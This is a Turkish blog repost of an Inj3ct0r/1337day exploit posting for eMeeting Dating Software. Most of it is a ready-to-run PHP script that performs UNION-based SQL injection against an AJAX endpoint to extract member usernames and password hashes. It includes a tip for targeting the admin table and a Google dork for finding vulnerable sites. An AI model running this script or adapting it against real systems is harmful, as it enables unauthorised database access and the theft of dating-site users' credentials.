eMeeting Dating Software SQL Injection Exploit

eMeeting Dating Software SQL Injection Exploit açığı bulundu.
SQL injection’un oluşum yeri, açığın kullanımı ve açık hakkında açık bulucunun açıklamaları aşağıdaki şekilde bulunmaktadır.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: eMeeting Dating Software SQL Injection Exploit
# Date: 2013-1-14
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://datingscripts.co.uk/
# Category: webapps/php
# Price: $155
# Google dork: "Powered by eMeeting LLC"
# Tested on: version 9 & 10
##########################################
 
# Exploit:
<?php
echo"\n\n";
echo"------------------------------------------------------------------------\n";
echo"1     _                   __           __       __                     1\n";
echo"1   /' \            __  /'__`\        /\ \__  /'__`\                   0\n";
echo"0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1\n";
echo"1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0\n";
echo"0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1\n";
echo"1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0\n";
echo"0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1\n";
echo"1                  \ \____/ >> Exploit database separated by exploit   1\n";
echo"0                   \/___/          type (local, remote, DoS, etc.)    1\n";
echo"------------------------------------------------------------------------\n";
echo"\n\n";
 
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
$host=$_SERVER['argv'][1];
$path=$_SERVER['argv'][2];
$spos=strpos($host, "http://");
if(!is_int($spos)&&($spos==0)){
$host="http://$host";
}
if(!$host=="http://localhost"){
$spos=strpos($host, "http://www.");
if (!is_int($spos)&&($spos==0)){
$host="http://www.$host";
}
}
$sql="inc/ajax/_actions.php?action=PopLinkedField&lid=1+union+select+concat(0x3e,username,'::',password)+from+members--"; # note: you can change table to "members_admin" if not found admin pass!
echo"exploiting...\n";
$source=file_get_contents($host.$path.$sql) or die('403 Forbidden..... Server has a Security'); 
$user=GetBetween($source,"this.value, >","::");
echo "username: $user\n";
$pass=GetBetween($source,"$user::",",>");
echo"hash: $pass\n";
} 
else{
echo"\n\n";
echo"Usage: php ".$_SERVER['argv'][0]." [host] [path]                       \n";
echo"Example: php ".$_SERVER['argv'][0]." http://www.site.com /path/    \n";
echo"\n\n";
}
function GetBetween($content,$start,$end){
$r = explode($start, $content);
if (isset($r[1])){
$r = explode($end, $r[1]);
return $r[0];
 
}
return '';
}
 
?>
 
# greetz to: all Libyans hax0r5 🙂

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir